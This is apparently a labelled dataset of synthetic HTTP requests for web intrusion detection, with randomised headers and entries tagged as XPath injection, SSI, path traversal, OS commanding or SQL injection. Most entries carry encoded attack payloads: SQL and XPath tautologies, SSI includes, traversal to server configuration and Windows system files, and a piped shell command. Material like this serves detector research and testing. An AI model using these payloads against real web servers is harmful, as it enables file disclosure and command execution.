Cookie: NGsPUJmNpassthru@=lnitaTtmneL)v;ntsc1itlliyg=' OR 'ehknoptCMai'  >  'S;txscsdfdraarr=355962
Cookie2: $Version="66"
Date: Sat, 12 Jul 08 01:53:30 CET
If-None-Match: *
If-Range: Mon, 21 Apr 08 07:08:06 CET
Max-Forwards: 5
Authorization: Basic RnhoZWExOmJ0aDg=
Referer: http://www.34pnnc.biz/oweOx6So/btespe/srioan.jsp
Trailer: If-Modified-Since
User-Agent: Mozilla/4.5 (Windows; U; Windows NT 7.2; ol-go; rv:5.5.6) Gecko/25634197
Transfer-Encoding: compress
----: -------------------------------------------------

null

End - Id: 41345
Start - Id: 49796
class: XPathInjection
GET /eA6YlNr8xl.kCz2qX/ewahhOn.jpg?oIaccess_logfS9Qz=8&Nedns4Ee=asOwe0igLxr&rezig=Ie4&to1uihiod8Ri=174946&Dnefd=sw%27+++++or++%28i+++%3C+count%28deihad%2Fchild%3A%3Atext%28%29%29++and++j++++%3C++count%28la%2Fchild%3A%3Acomment%28%29%29+++and+++k++%3C+++++count%28vee%2Fchild%3A%3A*%29+%29+or++++%27hu%27+%3D++++%27++7t%27+or&PpG2DY2htpassEv=winnt5&dtwaens7=fGeHGg&msystempNkvphttpssam=h18iEzn1etztYun&k5s=bthidaen%29&uo7ercngAbHDmaT=iZ.XIVPbJPtW&ammsTxhul=eoC83xe4 HTTP/1.0
Host: www.rtanheht.de
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.4, windows-1257;q=0.4, us-ascii;q=0.2
Accept-Encoding: 
Accept-Language: r-2ein;q=0.4, tKaEteA-rti;q=0.6, b-nf, umla-lpssu;q=0.5
Cache-Control: max-stale=061
Client-ip: 66.7.70.105
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="493"
Date: Tue, 23 Oct 07 03:02:26 UTC
ETag: W/"8Nw-K59c314vRFuXk"
Expect: 100-continue
From: ic2oxryy@hens5ahgle.org
If-Modified-Since: Sat, 18 Dec 04 20:42:42 GMT
If-Unmodified-Since: Sun, 05 Nov 06 15:18:36 GMT
If-Match: "iJHTf0cUl7AewDBTkq"
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: *
Max-Forwards: 68
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 7uesa tmtN=aaya
Range: 1-,586-,-3399
Referer: /mi6dbcbo/oC3r5dhl/E99gnrcr/ecTeanui/3aobC.doc
TE: trailers
Trailer: Accept-Encoding
User-Agent: BenteeaNes (aKrP-ebr; sfBNLJ_@; t._UmR8.PP; udu.-wC_J3; 0_I4UKdd@)
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 742x2872
Via: FTP/5.5 201.161.203.113, yntnU/1.6 www.wtb5hpn.htm:5, HTTP/6.1 45.148.223.16
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 972 67.57.148.71 "btc9redfdijsq0" 
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 09611302404410791541
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49796
Start - Id: 49065
class: XPathInjection
GET /soMHXtWd13Q/hTF7DqyjtIH3Dj/obantoo330lorkh/8alvn/cJtFpYM/eztnau.nsf?HdX9pcC0uv=949956&zAPmt1=ptedacc8rayRuoo&AbodyxtermXHZaccept=dmhl%27+or+count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2B+j+%2Bk++++%2B++l+%2B+1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++%27TwtsLi%27+%3D++++%27++++e9eiohR%27+++++or&3Ary8gnt=373&Wj@Ggroup byC=taaivffc7lttdyedo&BMFCl8AW=ibH+h2&zabjhaitnsgninj=opVzFjsuw6b&iletrhaa1oeyn=o%25uhnhg&a38ary=3csuesmnaeH3t4&shsw76qeN=hZcrlet5o&eeeVUlFo=EnoeqEj HTTP/1.0
Host: 191.46.86.203
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 164.173.183.167
Cookie: 6ynto3d4=W l-eN;g8NaG_fFWand0@=nrudnoon;dYPKU=%e'%=roteia t gqniwp-;awnno=258584
Cookie2: $Version="84"
Date: Tue, 11 May 04 14:47:31 GMT
ETag: "91bonU_8hX5Lp8pQC"
Expect: I3umu=lic0is
From: oT4sie@pMej.gov
If-Modified-Since: Sat, 10 Apr 04 06:18:55 CET
If-Unmodified-Since: Mon, 05 Feb 07 15:42:27 CET
If-Match: "sStgjOQPpH2mAv."
If-None-Match: *
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 3640
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: Basic OWhpZDphd3RocGVhNQ==
Range: -4,-1070,-459610
Referer: /ssnfO/rrwttee/ddt5xs5/i8Lhqdt/eohyns.htm
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/2.9 (X11; U; Open BSD i586 2.9; oi-Ar; rv:5.4.4) Gecko/58129285
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: FTP/8.8 www.iuates.htm, HTTP/9.3 243.159.36.87:4755
Transfer-Encoding: qahhra
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49065
Start - Id: 48295
class: XPathInjection
GET /h1tm4jemdtds6z0orh/dbzOMB/tuosdgtodec8sne/_giIfOLn8F4/ei7Mrtti/5w9o9hmSCPj/tUHxjlH5@38h.htm?hmeowci=143182&os=000269230&0Jklbisnerc7t=nsvC&otsaor=T%3D7hgcrshutdown&Qtylibe3AA-object3=llelaac&dytcdeeV=371tfsriurnswe&sbglase=cn8snetnlga1e6teE&id=6657&H19insert4=gs&boot.inivarselect1bqTKorhRrcp=a&swqlocationscriptzj=+pze+r%7Ctt&jz5smtlel=is5ieueYur6gx8Adihr%3C&T2wtzerX=r+%5D HTTP/1.0
Host: 33.4.36.114:10
Connection: close
Accept: text/plain;q=0.5, video/*, image/*
Accept-Charset: *
Accept-Encoding: 0045   or    1<    ziar/0m4odg/loai/child::text()[position()=491]   or   53474='] | /* | /foo[bar='
Accept-Language: *;q=0.9
Cache-Control: min-fresh=3
Date: Fri, 01 Jul 05 13:18:41 CET
From: q9erhj@rCea.net
If-Modified-Since: Sun, 06 May 07 07:56:25 UTC
If-Unmodified-Since: Tue, 31 Jul 07 16:01:25 UTC
If-Match: *
If-Range: Wed, 21 Jan 04 09:35:00 GMT
MIME-Version: 6.0
Authorization: Basic c2VjcmdzZTppZ3VzbmRhdA==
Referer: /Oerb4.php
TE: deflate;q=0.1,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (X11; U; Open BSD i586 3.9; O6-tr; rv:2.5.9) Gecko/45657130
Via: I0lqo/6.2 112.126.152.74, tSnieu/8.6 www.ncyh.jpg:3446
Transfer-Encoding: gzip
X-Forwarded-For: 50.28.189.18
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48295
Start - Id: 40508
class: SSI
GET /CtxeM7sdaO/1vmIdPGMFy.@V-j-O/tcnoacdt/0dmmKV/ji6htpass/rvy_8FXI2NEg/g1sd/rddfmhioqnWr/lea2iuteeulype.png?irsx=5945&0YLH2mL=%3C%21--%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E HTTP/1.1
Host: 230.172.151.54
Connection: snMqujf
Accept: video/*, image/jpeg;q=0.8
Accept-Charset: cp-936, windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 68.175.116.43
Cookie: soo=olllO8 rrtveiH;Dae5fvqacFds=341;61EeZpassthrun7tX=q;9quihPa=eDomeRk3cgMtrtkf;nhnmurnHdyew=yxrNj;gi=tREiDR3.AUb
Cookie2: $Version="147"
Date: Sun, 21 Mar 10 12:41:19 CET
ETag: W/"54B8lVmOobrQxpT5adm4"
Expect: 100-continue
From: dtmxe@ioclgro.it
If-Modified-Since: Thu, 02 Jul 09 05:54:10 GMT
If-Unmodified-Since: Wed, 15 Mar 06 14:44:04 CET
If-Match: "fxl.5yBL0MYaif30nTd"
If-None-Match: *
If-Range: Fri, 27 May 05 07:46:57 GMT
Max-Forwards: 54
MIME-Version: 6.2
Pragma: le=oiwoe
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: Basic bnRhaWFzbjppcm82dHVlbw==
Range: 049-19497,328865-,-538
Referer: /raVo/abeus/wekel/en81hal/a27seote.php
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: t3gRCa8oX http://www.snAt.biz
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 278x2627
Via: 2.4 50.116.99.173, 8.0 243.164.34.32, FTP/3.6 239.102.9.169
Transfer-Encoding: identity
Upgrade: stscth/0.9, onhEnx/5.9, pp0sG/4.5, we6h/6.0, dwhd/5.7
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 7235239060397255727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40508
Start - Id: 39445
class: SSI
GET /nMHXz/eY6KF.png?of4itn=33905&voooeNed=4HOnG33AT&TrcpyGd5D-=basupef%3A+iaorg&awrtzf=83&nJdltluesoti=ojy&XG5L-gpWE=t9DNiqj&tx4Edsa=140&hp3od8Iattnesa=hCHrl&Yp7ten=606432&auTstu9=40185&mdiboea7yeiffe=93&Di=%3C%21--%23email+fromhost%3D%22www.3obYdStv.com%22+tohost%3D%22mailbox.7isrc.com%22+message%3D%22rnwadn+wor9oiI+iieet+lwkeop%22+fromaddress%3D%22reXs.com%22+toaddress%3D%22esrns.te6a0e.com%22+subject%3D%22u%22+sender%3D%22atoo.com%22+replyto%3D%22seemNn.com%22+cc%3D%22n8%22+inreplyto%3D%22n1or+tUo+6eohao%22+id%3D%22oWomail%22+--%3E&ejsl=fd3dt4ebfie HTTP/1.0
Host: www.tdbiidnplt.de
Connection: rtQd
Accept: */*
Accept-Charset: shift_jis, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 179.178.240.191
Cookie: unoEblouhsns=W-tphpz;rrl=9eexnaw
Cookie2: $Version="52"
Date: Sat, 22 Mar 08 05:14:45 UTC
ETag: W/"JPFcUX7xR6dGHrCDQjp"
Expect: 100-continue
From: sEoagpeb@dl8co4.de
If-Modified-Since: Tue, 17 Oct 06 20:57:49 UTC
If-Unmodified-Since: Tue, 02 Oct 07 22:55:07 GMT
If-Match: *
If-None-Match: "ez4kgak4gfDr-36P"
If-Range: Sat, 11 Apr 09 11:39:49 GMT
Max-Forwards: 1810
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic dW9FcjphdnM3
Range: 336037-3,-38380
Referer: /drNrulbh/fwdf3v3/0ofe/9bwDar.asmx
TE: chunked,gzip;q=0.5
Trailer: Warning
User-Agent: 1pei6h
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: HTTP/9.3 www.Trpso.js, FTP/0.5 63.142.43.126, 5.1 www.2larirh.png:738
Transfer-Encoding: identity
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39445
Start - Id: 35763
class: XPathInjection
GET /Deaesisfer/B_hidAX/oj1OMH3lfKjBlVoH15yj/3z-@lpcz/9Llog/1-IkY0ybt/Oeokutobg.js?eahihte6n=g%2Flto%2Fm%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D616%5D+or+++++%27hat%27+++%3D%27 HTTP/1.1
Host: 168.74.36.132
Connection: fintgei
Accept: video/*, audio/basic;q=0.5
Accept-Charset: macintosh, windows-1254;q=0.2, x-mac-roman;q=0.8, x-mac-arabic;q=0.9, koi8-r;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: Ia-t;q=0.0, the-d, uvOla-g;q=0.8
Cache-Control: max-stale=5
Client-ip: 135.168.150.91
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="2"
Date: Fri, 03 Jun 05 19:44:11 UTC
ETag: W/"tsvQDtbvV-90U6TPs"
Expect: 100-continue
From: thoeIa@hnsapex3S.gov
If-Modified-Since: Thu, 02 Aug 07 08:53:55 UTC
If-Unmodified-Since: Sun, 18 Mar 07 21:09:12 GMT
If-Match: *
If-None-Match: "v2EW69CIUg3iNHIfe92O"
If-Range: "XQJ_4Fd1TI3VIeCVyS4D"
Max-Forwards: 865
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZWVzZDhocm40bnJjbnJJdXJhYzR0bmFlZGcyMXI5c3JkRW9leg==
Range: 9042-41
Referer: http://8afca.gov/tHriiegt/eepud/noitepT3/seTn8doL.asp
TE: chunked;q=0.0,gzip;q=0.5,deflate;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (compatible; Konqueror/8.0; Open BSD i586; pAfid9vae; omndonque9)
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6100x360
Via: 9.9 www.acuneet.htm, fLue/7.9 122.43.133.37
Transfer-Encoding: identity
Upgrade: inuOi/4.6, b70ue/5.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35763
Start - Id: 44952
class: PathTransversal
GET /eph1rffItW/libuN7o/e17/otoTtds/hesQgPt2OK-GZ/hioppra5/fxoibmIrjo/0attt.asp?ipiianehwi=iN&tedUoruvae=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&1nwuianexzxEsas=tLrmmM&rar=idostkvecnne1r9m&arj9sa9aTltoukd=eelprocessing-instructiond&revssgoctwtec=g&R5eeenTnln1=eEp&u.VIROI5=iyAU%40wW1tfJW&Ildgaa5enro=got&mDdy=766&bce8mc3tih=31233475 HTTP/1.1
Host: 139.10.56.223
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 160.90.111.224
Cookie: H5f5Mqvcats=jxiRtmu;abwmfdtsout9eoT=mI+r
Cookie2: $Version="009"
Date: Tue, 22 Nov 05 12:46:05 UTC
ETag: W/"eXLaXWzgwViq5Mu"
Expect: 100-continue
If-Modified-Since: Thu, 14 Oct 04 20:17:09 CET
If-Unmodified-Since: Fri, 30 Nov 07 04:34:51 GMT
If-Match: "7DZNf81oAYIfxPIXFaN"
If-None-Match: "iQ7FoCUhFbkVaQymC"
If-Range: *
Max-Forwards: 825
MIME-Version: 1.3
Pragma: twtt='Da4it'
Authorization: Digest response="48BA0352bFaFbf7469efC6Af1d9332Db"
Range: 3-48,355-44515
Referer: http://gcieha.it/xrqf/tn1bN9T/hqurrzmj/inhrieb.swf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: RpltbiCcebtt
UA-CPU: x86
UA-Pixels: 298x509
Via: HTTP/8.7 www.onda.css
Transfer-Encoding: deflate
Upgrade: oatfTn/9.9, osaa5/4.2
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 908789768
----: --------------------------------------------------

null

End - Id: 44952
Start - Id: 46220
class: PathTransversal
GET /uons/hcn4zcnEniesvw/miF_uCxnkqmL/ankmmx7bendobr1Ixs/o9qHo/c9.php?npcathieagT31Bv=%2Fetc%2Fhttpd%2Fhttpd.conf HTTP/1.1
Host: 6.208.15.25
Connection: hrfs25rn
Accept: text/*;q=0.4, application/x-tar;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.5, us-ascii;q=0.8, iso-8859-8, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 184.19.40.250
Cookie: xbxW@htaccesrcpN=713213;UrIm=cpe1nSoe8 ;vnEZk=594647459
Cookie2: $Version="6"
Date: Fri, 22 Apr 05 24:51:13 GMT
ETag: ".vLhO8Z0DK_yY@mG"
Expect: tiesfh=tc5ceo;tebom
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Thu, 23 Apr 09 11:08:40 CET
If-Unmodified-Since: Wed, 05 Mar 08 22:16:58 GMT
If-Match: "jVay4Kw5uNDkQbsU0J"
If-None-Match: "o4BDjPIariidaGzOlPh"
If-Range: Fri, 16 Nov 07 24:52:34 CET
Max-Forwards: 1
MIME-Version: 5.5
Pragma: peH8Aw2w='ilew'
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Digest username="2npn"
Range: 63-8582,2-821656
Referer: http://www.iztsp.fr/Hqllst/X1ase/8usYcnn/0otoe/2Malen.exe
TE: chunked,gzip
Trailer: Accept-Encoding
User-Agent: 2t-9UQKr http://www.nnnt.cz
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: eeesu; aAMy=6hnpsn5
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 677 234.22.108.123:360 "tgee6rvkuora" "Mon, 22 Jun 09 20:41:00 CET"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46220
Start - Id: 43446
class: OsCommanding
GET /emtwams.shtml?6284SZ6PsF=31360648&NsystemdL8sin6sjY=%7C+++++ps++-auxwww+++%3B&6eh7eis=5c9&ersiiu1ISal=oKT4oToilo&aatutlhisdInalL=Mf+&79Cw_Gzq87Y=aliow&wo=536 HTTP/1.1
Host: 104.55.139.216
Connection: F8eiw
Accept: */*;q=0.5
Accept-Charset: iso-8859-1;q=0.1
Accept-Encoding: *
Accept-Language: cwnNeta-aqgsetze;q=0.3
Cache-Control: only-if-cached
Client-ip: 107.215.79.167
Cookie: 2eoamuLaiL8gs=6s e;gaoethe0ho99=ctohtacces2e>OqeiFstst:ceO
Cookie2: $Version="05"
Date: Fri, 30 Jun 06 02:10:03 CET
ETag: "UWj2c5HfBtFSJ6LTOYlT"
Expect: a9incnt
From: Etwo@t45aetl.it
If-Modified-Since: Mon, 16 Feb 09 09:19:44 CET
If-Unmodified-Since: Thu, 08 Oct 09 11:56:33 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Oct 07 14:49:18 CET
Max-Forwards: 040
MIME-Version: 4.0
Pragma: e=ale
Proxy-Authorization: senaTy nseaDz=wasioi
Authorization: VPri otoheooh=enai
Range: -0418,311-
Referer: http://www.6gti.cz/3ear.jsp
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.6 (compatible; MSIE 5.7; Mac OS X; 6d1in4o2)
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 1.3 www.rzt5j.css:0185, 0.5 121.254.86.178, 4.8 www.aoe7uh.js
Transfer-Encoding: gzip
Upgrade: M4r/6.8, Aiye/1.9, wtraey/9.2, Ana/1.3, Na5he/7.8
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 209.66.111.141
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43446
Start - Id: 35837
class: XPathInjection
GET /tiiTte3onyobfet/re4aDSsm69ee/lustM79jtAii1ewf/nWw06X1WY.5Eh3MBcE8K/riaTaaeuHLt4armoA/gSL6hmtesaZ/90SrOg1jd_fr8X/t7q1w3.css?ott73bElmuwnhf=6906049820&othanrs=bgt%27+++++or+++++elor%2F70asn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D6%5D++or+++++%27t2ce%27++%3D%27&e1Tipedrrwseeb=3902224&l4=09921405&imnht4ea=at8eeb HTTP/1.1
Host: 39.194.74.47
Connection: aOeael
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Sat, 04 Jul 09 08:28:48 CET
ETag: "aq3Kr@.usbQW67kgtl"
Expect: saaE
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Mon, 01 May 06 01:11:34 UTC
If-Unmodified-Since: Tue, 29 Apr 08 09:14:54 UTC
If-Match: *
If-None-Match: "RpNIqkI9L_fw.d4uOhBh"
If-Range: *
Max-Forwards: 057
MIME-Version: 8.2
Pragma: rmssbh=8ile0
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: NTLM Y3cwcHVlN3N4eWN2dnJubm5kajN0ZWVpdXNiNWloa2FuTDN5SXJ0aHlHaW9QZlA=
Range: 77-,-9
Referer: /ehCdure/mif1/41ts/vainE/eo17.fgf
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: Mozilla/7.0 (Machintosh; U; Mac OS X 0.2; a8-8D; rv:4.1.5) Gecko/69515333
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: th9os/5.5 150.159.225.250, HTTP/9.9 www.aleoNiT.htm:91
Transfer-Encoding: gzip
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 9668656404576
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35837
Start - Id: 41875
class: SqlInjection
GET /st/65Hcaor/sTBf/na0xttify8Hiseew/QBQ3f/g2m1h/XedCFU5@6K7i3m.asp?s2ett9=646475&h7otyx5e=OrigText%27OR%27Wvfwrt%27+++%3D+++%27eats%27&si3dhamtaEebi=12 HTTP/1.1
Host: 90.212.113.195
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, identity
Accept-Language: enr-nvo5sAo, aavh-oejg;q=0.9, u-9;q=0.3, hu8nl9on-ou7;q=0.0
Cache-Control: min-fresh=856
Client-ip: 151.178.225.162
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="01"
Date: Thu, 14 Jul 05 05:46:08 GMT
ETag: W/"X9gKQ67xN.@_uj8"
Expect: estmtade=iia9d
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Mon, 05 May 08 21:01:52 CET
If-Unmodified-Since: Tue, 19 Oct 04 05:20:34 GMT
If-Match: "U1A5DuR7To-WV15tON"
If-None-Match: *
If-Range: Mon, 01 Nov 04 08:58:29 CET
Max-Forwards: 92
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: Basic b2VlZ3c6bmFuSGF6
Range: 2764-93323,17883-91
Referer: http://otiY.it/eomS/efof.msf
TE: trailers,deflate;q=0.3,trailers
Trailer: Date
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 9.2; de-8a; rv:2.5.9) Gecko/47301030
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: 2.0 63.242.122.3, FTP/9.8 www.nlhd.jpg
Transfer-Encoding: compress
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41875
Start - Id: 36193
class: PathTransversal
POST /gpmZaoobmh/gH7Rci@XQo33FfxeOOkv.sh? HTTP/1.1
Content-Length: 233
Content-Language: Og,wrdeh
Content-Encoding: gzip
Content-Location: /npSe.mspx
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 19 Jun 04 22:29:51 GMT
Host: www.Lgh5nt.uk
Connection: close
Accept: image/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Date: Sun, 03 Aug 08 21:17:50 UTC
If-Modified-Since: Wed, 29 Mar 06 05:41:23 UTC
If-Match: "rcXfBSG7yEBojpSD"
Max-Forwards: 7728
Proxy-Authorization: Basic bGFXb3c6RURzYWU4aG8=
Referer: http://oOhet.uk/ttmc/h8ntei/sFehwn8/dsswx/tg6slee.css
User-Agent: c:\autoexec.bat
~~~~~: ~~~~~~~~~~~~~~

et=h&haseisddn4=7404991&ts4=qp24\6i=:rf5ilc&idhaote=yo7bDesuol1rrd&epwuopfseeExeA=8681&lo=tlrNraTtkwiwnaap&svUOc= 5me'&nitxAh=bgsound aius|aOOlogo68yconnect&Lperl57@bodyv=9&zeus9syxfntjos=2617049&bsoa2ea27hsvpr=s4pAHjmrQ9iM

End - Id: 36193
Start - Id: 48327
class: XPathInjection
GET /nieeaoia9lrewa11rv/rTlOs0FE/hStiiepnEGtohbg3wdvr/2jRxS2iPxEOe35bm/trwhusz4tin/zkf1sPwY/oKHqC7alg4I/QdRexecw/tVIjAiyRgC4D9ZliW.cfm?slkste2a=eerioprocessing-instructionte+&F.48Kbd=2%3BctasN%2Bshutdowngpasswdve HTTP/1.0
Host: www.seftpl.biz:80
Connection: keep-alive
Accept: text/*, application/x-tar;q=0.8
Accept-Charset: windows-1252, iso-2022-jp, cp-932;q=0.7, iso-8859-5;q=0.8, iso-8859-8;q=0.0
Accept-Encoding: (i     <    count(ha/child::text()) and     j  <     count(E6ih/child::comment())    and k     <  count(EhmmY/child::*)  )
Accept-Language: r3-d3;q=0.2, 0reSEq-e3isbj, tjsgvt-nehcro, e2sdx-t, b-sIea
Cache-Control: ta47sMsg='eyadux6t'
Client-ip: 54.114.15.189
Cookie: gn=+p'da?1[@mdocumento
Cookie2: $Version="145"
Date: Sun, 30 Jul 06 10:42:54 UTC
ETag: W/"0Yak.Ku@h3TCPPnGQ"
Expect: ebfe=hrsgCw;obtV
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Mon, 12 Dec 05 13:59:13 CET
If-Unmodified-Since: Thu, 05 Jan 06 02:23:19 UTC
If-Match: "WGP@QVTfmxu76Hi"
If-None-Match: "DPEWa1Hfz3UFu@O@kT"
If-Range: *
Max-Forwards: 0
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: prriee L9Oe=uihhcs
Range: 200729-
Referer: http://www.ecAgh.fr/5eih.nsf
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: uAdeetmx (dGXVDQ; i9ChDUs.K; v_aSjKoFdV)
UA-Disp: 296,6544,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 433x249
Via: 0.4 159.100.180.107
Transfer-Encoding: compress
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 589 97.236.200.85 "tutzsttjueassase" "Sat, 28 Mar 09 19:51:19 CET"
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 278748120266538
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48327
Start - Id: 45599
class: PathTransversal
GET /dFf/i5wgsNsaiotject/m8mailn1Y/Sv/pY93lGhiSs9VaTkYLPZ/tooHlnis/pYMh.html?eageh4qatg=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&hQmL4Z5execwG0=im7p HTTP/1.0
Host: www.inttd.com
Connection: keep-alive
Accept: text/*;q=0.7, image/png
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=213
Client-ip: 2.178.204.132
Cookie: qUPA4F4var9HvJ=acs2awherehg9n1t;rwedc5f=38;opwae=Utahoeta  6z;2Tt6tedmtsmaa=137
Cookie2: $Version="7"
